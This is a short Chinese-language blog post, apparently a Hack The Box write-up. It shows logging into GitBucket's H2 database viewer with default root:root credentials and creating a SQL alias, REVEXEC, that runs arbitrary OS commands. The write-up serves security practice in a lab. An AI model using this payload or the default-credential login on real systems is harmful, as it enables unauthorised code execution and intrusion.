Stack Ashes
Go back

HTB-caption

  1. root:root alt text

http://10.10.11.33:8080/admin/dbviewer

考虑到 GitBucket 是一个 java Web 应用程序,从 cookie 中:JSESSIONID,我们想到了 H2,它是一个用 Java 编写的关系数据库管理系统(我们可以通过运行不正确的查询来确认这一点),我们使用查找版本,它是 1.4.199。在谷歌上搜索,我们发现了这篇关于链接 RCE 的 H2 数据库中的漏洞的 Medium 帖子。SELECT H2VERSION() FROM DUALH2 java 1.4.199 exploit

所以基本上,H2 容易受到 RCE 的攻击,我们可以执行任意命令。我们首先创建一个名为 REVEXEC 的别名,这将允许我们稍后运行 shell 命令和执行代码。

CREATE ALIAS REVEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");
    return s.hasNext() ? s.next() : ""; 
}$$;

alt text

执行后,我们现在可以调用我们的别名来执行命令。

alt text

alt text

公钥私钥? 利用私钥登录? alt text

alt text alt text

为啥? 反弹shell?

Share this post on:
Share this post via WhatsApp Share this post on Facebook Share this post on X Share this post via Telegram Share this post on Pinterest Share this post via email
Previous Post
APACHE_CVE-2021-40438-SSRF漏洞分析复现
Next Post
应急响应